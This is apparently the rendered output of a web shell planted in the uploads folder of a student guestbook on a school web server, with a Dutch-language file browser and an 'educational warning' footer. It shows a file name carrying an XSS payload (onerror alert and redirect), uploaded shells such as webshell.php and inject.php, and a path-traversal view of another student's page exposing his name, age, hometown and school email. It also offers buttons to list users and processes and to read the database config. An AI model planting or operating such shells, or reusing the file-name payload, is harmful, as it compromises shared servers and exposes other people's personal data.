🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ../../../../592730.klas4s23.mid-ica.nl/public_html/overmij.php

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css">
    <title> Over-Mij</title>
</head>


<body>
    <?php include_once "header.php" ?>
    <script> document.getElementById("overmij").classList.add("current"); </script>
    <div class="container">
        <div class="foto">
            <img id="ikfoto" src="Ik.jpg.jpg" alt="ik" style="width:400px;height:571px;">
        </div>
        <div class="text">
            <h2>Over-Mij</H2>
            <p>Mijn naam is Arthur. Ik ben 17 jaar oud en woon in Amersfoort. Ik ben geboren in Frankrijk in
                Mont-Saint-Aignan en heb mijn eerste 3 jaar van m'n leven in Frankrijk geleefd. Daarna ben ik naar
                Nederland verhuisd, eerst heb ik een paar jaar in Bussum gewoond en daarna ben ik verhuisd naar
                Amersfoort. Ik heb 2 honden en een kat. Mijn hobby's zijn: Voetbal, ik voetbal bij Amsvorde in de
                JO18-1. Ik voetbal al sinds zo'n 10 jaar en altijd bij Amsvorde. Een andere hobby van mij is gamen. Ik
                game graag met vrienden en op dit moment speel ik vooral Call of Duty. Ik heb gekozen voor deze
                opleiding omdat, ik zat nog dit schooljaar in HAVO 5, maar ik wist niet echt wat ik wilde doen. Ik had
                al wel bij HBO's gekeken, maar die waren minder leuk dan ik had gedacht. En toen dacht als ik niks op
                het HBO kan vinden kan ik ook bij het MBO kijken en zo zag ik online de opleiding Software Developer en
                die leek me wel leuk en toen ging ik ook kijken op de opendag. Ik vond het dus heel leuk en interessant
                en ik zag dat ik in februari kon beginnen en zo ben ik nu begonnen met deze opleiding.</p>
            <br>

            <H2>Contact</H2>
            <p>E-mail: 592730@edu.rocmn.nl</p>
            <br>


        </div>
        
    </div>





</body>




</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!